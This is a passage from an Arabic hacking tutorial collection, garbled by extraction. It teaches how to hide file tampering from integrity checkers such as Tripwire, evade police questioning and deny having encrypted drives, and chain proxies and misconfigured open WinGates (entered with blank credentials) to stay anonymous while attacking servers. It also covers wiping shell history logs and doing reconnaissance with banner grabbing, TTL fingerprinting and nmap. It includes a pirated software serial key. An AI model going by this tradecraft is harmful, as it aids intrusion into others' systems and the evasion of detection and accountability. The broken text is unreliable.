hobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pl
l5 : compile directory : l5
كما تري هناك احتمالت كثيرة ،ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر ،مثل جزء
NTFSلمضيف او جهاز آخر ،او حتي قواعد بيانات التي تحمل معلومات checksumفي جهاز محمي
علي الكتابة ) اقراص CDمثل ( ...
ولكن يمكنك القيام بعملية فحص استطلعي سريع لمعرفة البرامج المستخدمة ،واذا لم تستخدم ففرصتك،
واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك النواع من البرامج هذا يعني ان الموقع او المزود
محمي بشكل جيدا ) هارد لك ( ويجب ان ل تعبث بالملفات ابدا ..
ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟
يمكنك - 1ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات
مثل "."tripwire -update /bin/target
- 2يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فل يتم فحصها مرة
اخري للتحقق ) ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها ل يتم فحصها ب checksum
حتي ل يتم اكتشاف التغييرات التي قمت بها (
-ملحوظه :ان كان في اعتقاد ال administratorsانك hackerفانت ==< مذنب حتى تثبت
براته ...
ليعني القانون اي شئ لل ) adminsبعض الوقات اعتقد انه ل يوجد فرق بين ال hackerو ال
administratorال بان مالك الكومبيوتر هو ال administratorفقط ( عندما يعتقدون انك هاكر فانك
فورا اصبحت مذنب ..سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف الدمين
سيرصدك ايضا هجماتك الخرى ..
اذا كان يمكنهم مراقبة كل هذه التصالت اكيد ببساطه يمكنهم مراقبة خط تيليفونك ..
لذا فعليك عدم القيام باي اتصالت فيها اخبار اخترقاتك ..و ان حتى اردت ان تحذر اصحابك فل تخبرهم
هاتفيا او ببريد الكتروني ) ال اذا كان مشفرا( و من الفضل ان تخبرهم عندما تقابلهم وجها لوجه ..و
تمنعهم من راسال اي رسائل غيير عاديه ..
لتؤمن نفسك عليك ان تبقى على هذا الحال على القل من شهر الى شهرين ..و ال ستواجه مشاكل اعتقد انك
85
لترغب بها
**************
اول :اطلب محاميك فورا !!!! :ل تحاول بان تتذكى انت و ترد على التحقيق بمفردك ..فاطلب محاميك كي
يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان ل تذكره نهائيا ..بعدها غالبا ما سيطلب
المحامي جهازك ) الكومبيوتر ( باقصى سرعه بحجة احتياجه في العمل و ال عليهم تحميل جميع العباء
الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز ..لذا فانه من العملي جدا ان يكون عندك محامي
جاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير
ثانيا :ابدا ل تتكلم ال الشرطه !!! :لتعطي للشرطه اي معلومات عنك او عن زملئك بحجة ان هذا سيخفف
العقاب عنك و سيخرجك من المازق ..لن هذا لن يفيدك بل سيدينك اكثر ..و ان كان يجب استجوابك فاطلب
ان يتم هذا فقط من خلل محاميك ) و هذا ايضا حق من حقوقك (
لتخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه ..انما ايضا بدخول اصحابك في الموضوع ستتسع
دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا !
بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك
بمنتهى الحريه عدم الفصاح عنها
لكن بعض الدول الخرى في قانونها انه مادامت وقعت في المصيده لبد ان تدلي لهم بكل شئ في هذه الحاله
انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره
86
لتدعهم ابدا يقبضون عليك ..دائما اجعل عيناك مفتوحان ..اعرف في من تثق و من ل !!
لتفكر في نفسك فقط )انما ايضا تذكر كل من حولك (
تمنياتي للجميع بحياة ممتعه و امنه ..
انتهى،،،
>ةةةةةة :ةةةةةة<
87
++++++++++++++++++++++++++++++++++
88
تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! (..
تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعلن كأن يقول
استخدم
cach.microsoft.comبمنفذ 80
وطبعا انت ماتصدق تلقي بروكسي بهذي المميزات
-1سريع التصفح
-2يفتح جميع المواقع
-3التحميل عالي جدا وقوي
هل تعرف لماذا ؟
لن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا
لن هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات Logs
Introduction to Wingate
=)الدخول أو الدخال إلى =(Wingate
كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟
ماهو WinGate؟
هو proxy server firewallأي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي على
حزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك ) Anonymouslyمجهول الهوية(
التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت بشركة كمبيوتر بالكامل
اتصال النترنت يكون مشارك بواسطة WinGateتقريبا لعدة أنواع تشمل:
-------------------------------------------------------------------------------------------
dial up modem, ISDN, xDSL, cable modem, satellite connection, or even
dedicated T1 circuits
-------------------------------------------------------------------------------------------
wingate
متشابه مع البروكسي سيرفر حيث يعمل اتصالت مع كومبيوتر لسيرفر آخر خلل المنفذ , 23في الحقيقة
هو اتصال . Telnet
the wingateسوف يجعل أي شخص على الشبكة دخول النترنت أو التصال به لمواقع أخرى .بصورة
سيئة وفق بين wingateوعدم كفاءة ) Aminstratorالمدير(
وهنالك العديد من wingateوالذي تجعل الشخاص على النترنت للتصال ببعضهم ,بدل من تحديد
المدخل للناس من ) Local Networkالشبكة المحلية(
وفتح الطريق لي شيئ من ipspoofفي ICQ - Mircإلى سوء استغلل الحجم .
مثل wingateقد يطلق عليه open wingatesوعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقوم
باكتشافه ) Adminالمدير( وهذا راح يكون DIScoverياأخواني يعني مكشوف أو يتلقى شكاوي من
سوء استخدام أو أعضاء غامضين !!!
الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس التصال لكن ياأخوان المشاكل
تفوق الفوائد
إذا أي شخص قام بتنزيل WinGateخاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفق
بشكل آمن وهنالك أخرى متعددة أكثر WinGateأمانا مثل برامج SyGate
في معظم الحالت ملفات ) Logsسجلت( الخاصة بالـ WinGate Serverتحذف عادة بعد 48ساعة
للعمال وأيضا للـ ) ISP'sخاصة بالكبار(
أي ليوجد حاجة أو موارد لتدوين كل شيء يصادف خادم wingate
89
كل ماعليك فعله هو وضع مدى ipاو hostnameومن ثم البدء بالبحث
مثل اقترح عليك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقيا وأخيرا شبكة @homeكلهم
يتشابهون ولديهم صفات شائعة وهي:
توفر wingatesوالذي وفق بصورة رديئة وعادة هناك wingateمفتوح قليل على NetWork
حقهم ...
خلل Unixأفضل طريقة هي :المحاولة والخطأ
Trial and Error
اتصل بالتلنت في wingateمن المنفذ 23
واذا لقيت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سرك
او تستخدم ميزة ) Guestالضيف( أو Anonymously
**********************
وهذه برامج مساعدة على بقائك مجهول الهوية
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
-------------------------------------------
--------------------------------------------
لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهول %100
انتهى،،،
>ةةةةةة :ةةةةةة<
ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق...
هذه الفقرات عن Chaining Proxiesلبقاء حريتك وسريتك على النترنت وقت أطول أثناء اتصالك لكن
لتظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول
90
وأيضا سوف نتكلم عن Chaining wingatesلتصبح مجهول على Telnet
)-------------------------------------------
من المعروف أن أغلبكم يستخدم proxyلخفاء ipالخاص به او Domainاو قد يستخدم البروكسي لكي
يجتاز المواقع المغلقة وأيضا لحماية هويته .
لكن عليك ان تتعلم كيف تستخدم Proxyومن الفضل ان تعرف ماذا هو Ip Addressو Domain
أول ,,,
قبل أن تقرأ هذا الموضوع علي اول ان اقوم بإرشادك كيف تحصل على Proxyمع تحديثها من هذه
المواقع:
http://www.multiproxy.org/anon_list.htm
/http://tools.rosinstrument.com/proxy
أو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ Groupوهو يقوم بإرسال بروكسيات جديدة جدا
وبمنافذ مختلفة
الجروبP_R_O_X_Y@yahoogroups.com:
طريقة التسجيل
قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة
في خانة الرسال إلى اكتب
P_R_O_X_Y-subscriber@yahoogroups.com
وأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل Replay
الن مبروك لقد سجلت بالجروب
)-------------------------------------------
=========================
أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن
البروكسي يعمل بالذهاب إلى :
/http://www.privacy.net
أو
/http://www.proxytester.com
وقد تعرف هل عنوان Ipتغير أم ل !!! هذا بالنسبة للموقع الول أما الموقع الثاني فهو خاص لكشف
البروكسيات واعطائك مستوياتها ..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على النترنت البروكسي
يرسل طلبك على النترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن
في Proxy Server
كما قلنا في الموضوع السابق...
هذي توضح كيف تتصل عن طريق البروكسي بالموقع
][User]>>>>>[Proxy]>>>>>[Web Pages
----------------
Proxy Chaining
91
----------------
معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من
بروكسي لكي تعرض موقع واحد
مثال/
][User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination
يوضح هذا المثال ان المستخدم اول عليه التصال بالبروكسي الول فالثاني فالثالث والرابع وأخيرا الهدف
مما يسبب بطأ في التصال
Destination = web page, Unix server, ftp server, etc
إذا Proxy chainingمطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أي
serverمثل telnet, ftp, or http
Chainingهي مهمة كما أقول لن تصبح مجهول %100لكن حاول بقدر المستطاع على ان ل تمسك
ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثل حاولت تدخل على موقع بالـ
ftpراح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من
Adminstratorملفات Logsلكي يعرف المصدر والمصدر ايضا راح يكون proxyههههههههه
يعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية Chaining Proxyعملية مفيدة جدا
ويصعب احدهم المساك بك
لكن ملفات Logsتنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسموح به من تحميل
الملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات Logsمتجددة ...
----------------
HTTP Chaining
----------------
HTTP chainingهي نفس طريقة Proxyويمكنك عملها من مستعرضك وفي خانة Address
مثال:
http://proxy.magusnet.com/-_-http://www.google.com
http://anon.free.anonymizer.com/http://www.google.com
مثال آخر
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
= proxyاستبدله ببروكسي رقمي يكون أفضل لك .....
----------------
Browser Chaining
----------------
وهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن Internet Explorerلنه الكثر
استخداما ----
ألحين مثل عندنا بروكسي
213.234.124.23:80
العنوان213.234.124.23:
92
المنفذ80:
ألحين كيف نحطها بدال البروكسي الخاص بالـ ISPأي مزد خدمة النترنت
نروح عند
أدوات Tools
خيارات إنترنت Internet Options
بعدين اتصالت Connections
تختار التصال الي تدخل في النترنت بعدين
إعدادات Settings
راح تجد
) Addressالعنوان(
) Portالمنفذ(
ونضعه بداله
العنوان 213.234.124.23:المنفذ 80:وبعد كذا اضغط موافق و
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingateهو proxy serverالذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون
مقاعدهم بالمنفذ خلل )) 23منفذ Telnetالعادي ((
بعض Wingatesيسمحون لي شخص متصل onlineلكي يتصلون به مباشرة او في وقت قصير
لتتعدى اليام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـ Adminتمنع من استخدام
wingateعلى جهازه هذا على حسب المدير هل يفهم في هذا المجال أم ل !!!!
وهي عبارة عن ipأجهزة أو اسماء أجهزة تتصل من خللها على المنفذ 23بأداة Telnetأو يمكنك من
عمل بحث ببرامج
WinScan
Wingate
93
Download
-------------------------------
Chaining Wingates Using Telnet
-------------------------------
هي فقط DoSوأداة Telnetلظن أن الجهزة سوف تخلو من أهم هذين الداتين إل نادرا .....
جميع wingateتتصل عن طريق المنفذ 23لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا
فقط كيف يتم التصال بالـ Telnetعن طريق المنافذ
بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا
94
اتصل بالموقعwingate ألحين بعد ماتتصل بأكثر من
WinGate>arbornet.org
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected
،،،انتهى
95
"بين حماية الخصوصية وإزالة الثارمن ملفات الـ "Logs
فيما يتعلق بموضوع التخفي ومنع تعقب الثر مع سيرفرات يونكس أو لينوكس .أوًل لبد أن تعلم أن من أهم
خواص يونكس التي تمنحه القوة .تقوم على تعدد المستخدمين Unix Multi-User Mode .
. Operationثم ل بد أن تعلم أن ) ( Linuxهو الصدار المجاني من نظام يونيكس ) . ( Unixيعني
الفضل فهم يونيكس فحتمًا ستتعامل مع لينوكس بكل ارتياح كونك تتعامل مع Unix
القسم الول :يخص ملفات النظام التي يسجل فيه اجراءاتك ( LOG File ) ...
القسم الثاني :يتعلق باتصالك وحماية خصوصياتك ...وهذا يقف عن قدرات كل شخص فينا ....
في الواقع جميع الجهزة في انترنت تجمع المعلومات عنك ،ابسطها مثل عنوان ال IPو اكثرها حساسية
مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ........ملفاتك و جهاز كومبيوترك محمي
بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية ،ولكن
حتى ولو حصل ذلك ففي غضون السابيع القليلة الولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة
للستخدام الغير سليم لنترنت تتابع الشركات نظم التشغيل بشدة ،الكل يتابع الثغرات في Microsoft
Windowsو Linuxو Macو غيرهما ،لذلك من الصعب الوصول الى تلك الجهزة بصورة فورية و
بدون تدخل رسمي ....
96
والحقيقة انا لزلت في بداية طريقي لهذا المجال واسال ال ان يسهل ويفتح علينا من فضله ..
القسم الول :يخص ملفات النظام التي يسجل فيه اجراءاتك ...
ما يتعلق بملفات التسجيل لجراءاتك تسمى ) . ( LOG Fileمؤرخه بالوقت والجراء .
وتسمى سجل الحداث كما تسمى ملفات سجل الداء
جل جميع مزّودات الويب ) (Web serversمعلومات واسعة عن حركة الوصول إلى موقعك ،ضمن تس ّ
ملفات سجل الداء ) ،(log filesوهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزّود.
ويمكن تحليل معلومات سجل الداء يدويًا ،وهذا ما كان يفعله الناس ،في بدايات شبكة ويب .لكن إذا زاد حجم
ملف سجل الداء ) (log fileعن بضعة كيلو بايتات ،فإن التحليل اليدوي يصبح غير عملي ،إن لم يكن
ل كليًا .وإذا أخذت بعين العتبار أن مزّودات اليوم توّلد ملفات لسجل الداء ،يصل حجمها إلى
مستحي ً
ميجابايتات كثيرة ،بل ويصل في كثير من الحيان إلى جيجابايت أو أكثر ،لدركت ببساطة أن التحليل اليدوي
غير وارد إطلقًا.
ملفات سجل الداء
تبعًا لمزّود الويب الذي تستخدمه ،تحتوي ملفات سجل الداء ،على بعض-ومن المحتمل جميع-المعلومات
التالية ،لكل زيارة يقوم بها زائر إلى موقعك:
وأريد أخبرك ان ثمة ملفات ل يمكنك الووصول لها وهي تراقب كل اجراءاتك ...وتختلف الجراءات المنية
من نظام لخر حسب قدرات مدير النظام الذي تعمل عليه ...
97
اقتباس:
bash_history.
هنا راح تسجل جميع الوامر التي نفذتها
contactemail.
اذا ما كنت تستخدم الشل النصي للتعامل مع البريد
وراح يكون ناتج ملف lastlogin.هو اليبي الذي دخلت به اخر مره .
طيب وش الحل ننسفها نهائيًا وما نريد أوامر الحذف تظهر ....
الطريقة تستخدم cpanelهو أفضل إجراء .وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك من
البداع ومن التجديد والبتكار ..
واذا مد ال في عموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل باليبي المحلي localhost :
العمر تكلمنا عن هذا الموضوع باذن ال ...
لحظ هذه الصورة :وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بل اي معلومات
عن المصدر الحقيقي للتصال ....
98
عموما سأعود لهذا الموضوع اذا مد ال بالعمر وال اني اعمل من اشهر على كتابة دروس نظرية وتطبيق
عملي لحتراف يونيكس ...
وراح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسموح لك بملكيات ...فوال تستطيع
الحذف ...
أخوي الحقيقة المشكلة أن الغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه ..وان
سهل ال ..اشتغل ببروكسي يعمل مع بروتوكولت التصفح ) ( HTTP Protocolويجب أن ندرك أنك
حين تتعامل مع نظام يونيكس أو النظمة الخرى الشبيهه
والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا ل يخفي هويتك اذا استخدمت بروتوكولت
HTTPولكن الحل المثل ....أنك تستخدم بروكسيات السوكس . SOCKS Protocolفيجب عليك
إيجاد ارقام سوكس لستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام .
عموما البروكسيات في مجملها ثلثة أنواع .
Web Proxy Service (1وهذا للتصفح . HTTP Protocol .
WinSock Proxy Service (2وهذا مفيد مع سيرفرات windows NTويفيد في عملها على
اخفاء هويتك عند العمل على بروتوكولت telnetأو FTPوهذا هو البروتوكول WinSock
...... Protocol
. Socks Proxy Service (3وهذا القوى ويستفاد منه في )SSL) Secure Sockets
Layersبالضافة إلى ) IIS) Internet Information Serverويخدم مع Windows NT
وكذلك FTP ، Telnet، Gopher،IRC ، RealAudio ، POP3وهذا النوع يجمع بين كونه
firewallإضافة إلى خدمة أمنية ... securiy .وتكمن وظيفته في تغيير معلومات موارد خدمة النترنت
التي تتصل بها .....وعادة ما يستخدم فيها بروتوكول TCP/IPويستخدم هذا البروتوكول وسيلتين للتصال
:
* طريقة المنظمة العالمية )(Internationa Organization for Standardization
** مجموعة بروتوكولت للتصالت .وضعتها وزارة الدفاع المريكية ransmission Control .
... Protocol TC
الحقيقة أخواني هناك أمر هام جدًا وهو أن ثمة برامج تساعدك كثيرًا بتقنياتها المحترفة تساعدك في التخفي
من تقنيات الرقابة التي ل يخلوا منها نظام ...وهي كثر جدًا :
Ping، Traceroute, DNS lookup, Finger, Whois, LDAP, SNMPوهذا يكون باعتبار
النظام واعتبار بروتوكول التصال الذي يستخدمه نظام ... WIN NT :ويستفيد من وتوكول TCP/IP
لمراقبة النظام ...
وبالمقابل يتم مراقبة نظام UNIXعن طريق الرواتر Router .وهو أداة فعاله لتشخيص النظام ونعني
بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة
ويعمل عى مراقبة الداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقلليتها
...ومواصفاتها وعناوينها الخاصة .
وهنا نوعين للموجهات أو الموزعات ) . ( Routerالول :إستاتيكي يتطلب من مدير الشبكة ضبط يدوي .
ويتميز هذا النوع بالمان .
99
والثاني ديناميكي ....يقوم بأعماله اتوماتيكيًا ...ويحتاج الى ضبط بسيط وهو أقل أمانًا من الول .
عموما انا اسف ربما تفرعت في هذا الموضوع .عموما إخواني بالنسبة للتصال ...أنا أقول لكم عليكم
بتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ...ببرامج أو بدون .وعليكم بمراقبة هذه البورتات :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
Port 111 = SunRPC
Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail
والحقيقة الفضل من هذا كله أن تسجل دخولك باليبي المحلي أو لبد أن تستخدم بروكسيات من نوع سوكس
.
وهناك برامج جيدة كالتالي :أفضلها في نظري أداءًا وسهولة ...برنامج HTTPortومعروف لديكم أكيد .
صورة للبرنامج اناء عمله .
تقنية حديثة مرتبطة ببروتوكول التصال TCP/IPالخاص بشبكة النترنت ،فقد صمم برنامج HTTPort
من أجل إخفاء الهوية الحقيقية عن الخرين وأيضا يتخطى المرشح(البروكسي ) Proxy Serverالتابع
لمزود الخدمة ISPوأشبه ما يوصف بأنه برنامج يشغل برامج النترنت من تحت نفق وهمي يتجاوز
الحواجز المنية )المرشح ) Proxyوليرتبط مع بروكسي آخر.
وكما ذكرنا فان برنامج HTTPortبطريقة عمله يحقق حرية التصفح في شبكة النترنت وإخفاء هوية
المستخدم .
بل وستخدم ايضًا بروتوكول SOCKSويقوم بدوره خير قيام فهو يخفي هويتك ول يمكن حتى لمسؤول
الشبكة المحلية معرفة نشاطك ناهيك عن هويتك ...
وهنا ايضاحات لبعض الخدمات التي يؤديها البرنامج ؟
100
101
102
103
104
سواءًا كان الفعلي أو... هذا بالضافة إلى أن المتصفح اكسبلورر يسمح لك باضافة بيانات مزود الخدمة
( Anonymous) وهمي للتخفي
: واسمه... كيلو بايت إل أنه يخدم أكبر من حجمه بكثير جدًا18 وهناك برنامج صغير ل يتعدى حجمه
AnalogX Proxy
HTTP (web), HTTPS (secure web), POP3 (recieve mail), : فهو يدعم كل هذا
SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and
Socks4/4a and partial Socks5 (no UDP) protocols! It works great with
Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft
!Messenger, and many more
http://www.analogx.com/files/proxyi.exe
105
حمل من هنا برنامج PortBlocker
http://www.analogx.com/files/pblocki.exe
والحقيقة أحمد ال الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلت
لمراقبتك أناء عملك على نظامك .
بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ...
فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم ول تنسوني من دعوة ...لني متأكد ان الكم الهائل
من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ...
اسم البرنامج Proxy Log Analyzer :
صورة :
106
فقط استخدام العدادت المتقدمة للتصال :
حتى اليبي بالماسنجر بامكانك ترسل كل ملفاتك بل حصول أي انسان على اليبي الحقيقي لك .
والطريقة سهله ...اذهب افتح الماسنجر من قائمة ادوات خذ خيارات .
107
انتهى،،،
>ةةةةةة:ةةةةةة<
اسم البرنامج:
------------------------
HTTPort 3snf
------------------------
الوظيفة:
------------------------
برنامج لتصفح بسرية وأمان
في النترنت
,,,,,,,,,,,,
------------------------
وصلة التحميل
------------------------
http://www.angelfire.com/tv2/ssdd63/httport3snf.zip
------------------------
الشرح:
-------------------------
الشكل الول
108
واجهة البرنامج الرئيسية أضغط على الختيار الثالث فوق
Port mapping
الشكل الثاني
الشكل الثالث
109
هنا ياطويل العمر تكتب نفس الكلم والرقام المكتوبة زي كذا
Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN
الشكل الرابع
110
ومكان الرقم أثنين المنفذ
وفي الخير ضغطه قوية على الزر
Start
ماخلصنا بقى الخطوة الخيرة
الشكل الخامس
انتهى،،،
111
" شرح برنامج " NeoTrace
>ةةةةة<
هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة اليبي ماله ..او تريد
تعرف معلومات عن موقع معين ..
112
113
اتمنى ان الشرح وافي وهذا هو السيريل نمبر :
XDQG-2ZKN-X2PA-KTRQ
انتهى،،،
114
" كيفية القيام بجمع المعلومات عن موقع أو شبكة "
>ةةةةةة :ةةةةةة<
=)الطريقة الولى(=
^^^^^^^^^^^^^^^^^^^
وهي من خلل زيارة موقع
/http://www.netcraft.com
وتكتب الموقع هناك وراح يعرض لك معلومات تفيدك كثير
^^^^^^^^^^^^^^^^^^^
=)الطريقة الثانية(=
^^^^^^^^^^^^^^^^^^^
وهي قديمة تستخدم حديثا لكني لادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هو
/http://www.almodammer.com
نقوم بإرسال رسالة ليميل وهمي وغير موجود مثل
dfl;kjgk'dgjbumpipt@almodammer.com
وبعد ارسال رسالة ليميل وهمي راح تستقبل رد ولما تعرض الـ Headersالخاص بالرسالة راح تلقي
معلومات عن الموقع
^^^^^^^^^^^^^^^^^^^
=)الطريقة الثالثة(=
^^^^^^^^^^^^^^^^^^^
الـ Banners
ماهو البانر؟
البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد..
وكيف راح نستغلها في كشف معلومات الموقع؟
عن طريقة أداة Telnet Clientعميل التلنت والطريقة هي أن تقوم بالتصال بأحد المنافذ سواء كان
FTP 21
أو
TELNET 23
^^^^^^^^^^^^^^^^^^^
=)الطريقة الرابعة(=
^^^^^^^^^^^^^^^^^^^
وهي HTTP
Hyper Text Transfer Protocol
ويعمل على المنفذ 8080 - 80
ألحين نتصل على المنفذ 80عن طريق Telnetوبعدين نكتب المر التالي
GET /qwe HTTP/1.1
بعد كذا راح يخبرنا البانر بوجود صفحات الخطأ 400
وراح تجيك معلومات هائلة عن الهدف
وفيه عندك امر ثاني وهو:
HEAD 127.0.0.1 HTTP/1.1
تقوم بتنفيذه ...
^^^^^^^^^^^^^^^^^^^
115
=)الطريقة الخامسة(=
^^^^^^^^^^^^^^^^^^^
وهي من أمر pingالذي يقوم بإرسال عدة طلبات للـ ipأو للموقع ويقوم باستقبال الردود وبسرعة هائلة
الحين كيف نستفيد منها في تحديد معلومات للموقع !
حيث تقوم بوضع التالي
ping ipsite
=ipsiteالي بي الخاص بالموقع
وراح يطلعلك عدة اسطر حنا مايهمنا ال كلمة
TTL=XXX
=XXXالقيمة والعدد الي طلعلك
بتقولي وش فايدته أقولك من خلله يمكن تحديد نظام التشغيل وهذي امثلة:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255
وقد يحدث اختلف في القيم حيث يكون الفرق يساوي واحد
أي :عند مرور ) data list or packetحزم او قائمة بيانات( بـ Nodesحيث أن TTLتنقص بـ 1
لذلك عليك ان تستعمل أمر tracertفي الويندوز أما tracerouteفهو خاص باليونكس
وهو امر خاص بعرض معلومات عن الشخص أو الموقع
ويمكننا استخدامه بهذه الطريقة
tracert ip
=ipعنوان الموقع أو السخص
^^^^^^^^^^^^^^^^^^^
=)الطريقة السادسة(=
^^^^^^^^^^^^^^^^^^^
عن طريقة الدوات والبرامج
أول Windowsلنه السهل
يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغلل
المنافذ بكثير من عمليات الختراق وسوف نطرق لها في الدرس الثاني
تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا راح اذكر الفضل
:
) N-Stealthلتحديد معلومات عن الشبكة منها المنفذ ثغرات ...الخ(
=============
( Shadow Sceurity Scannerمن أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم
116
(الثغرات مع وجود شرح لكيفية علجها
=============
(برنامجي المفضل فأنا استخدمه لختراق المواقع والجهزة حيث يساعدني كثيرا في معرفةSuperScan
( كبيرة يمنك الضافة عليها كيفما شئتList المنافذ المفتوح بالموقع والجهزة ويحتوي على
-------------------------------------------------------------------------
Linux الحين نجي على
هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسم
Nmap
( )مستكشف الشبكاتNetwork Maper اختصار لـ
وهو خاص للمتهمينLinux وطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـ
السيرفرات/المواقع/باختراق الشبكات
: كيفية استمعاله
/ وراح تجد الكثير من الوامر الذي ظهرت مثلnmap شغل
[l] Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
(Some Common Scan Types ('*' options require root privileges
